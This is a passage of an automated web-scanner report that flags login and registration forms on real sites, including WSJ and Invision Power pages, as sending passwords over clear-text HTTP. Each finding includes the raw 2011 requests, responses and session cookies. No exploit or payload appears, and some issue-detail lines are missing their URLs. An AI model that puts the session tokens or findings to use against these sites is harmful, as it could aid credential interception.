User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=16bbd6a3efa6f42a30f8d5c0d22a2d10; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32760

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26a6b17494dde8cfa26a90ef195a3c6d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmlobmBmbWtVwwUA4GMg%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34380

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=23b36da2676ec4b7a7eada851882031e; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNDQ3NLauBVwwVbgGYg%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33618

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.5. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.7. http://fis.com/fis/worldnews/worldnews.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

4.8. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">


<input type="hidden" name="FormPage" value="login">
...[SNIP]...
<td><input class="smalltxt" name="password" type="password" size="10"></td>
...[SNIP]...

4.9. http://ipboard-software.software.informer.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div>
       <form accept-charset="utf-8" action="/login.php" method="post" id="register">
               <div class="hidden">
...[SNIP]...
</p>
       <input type="password" name="passwd" />
       <p>
...[SNIP]...

4.10. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.11. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

4.12. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.13. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (c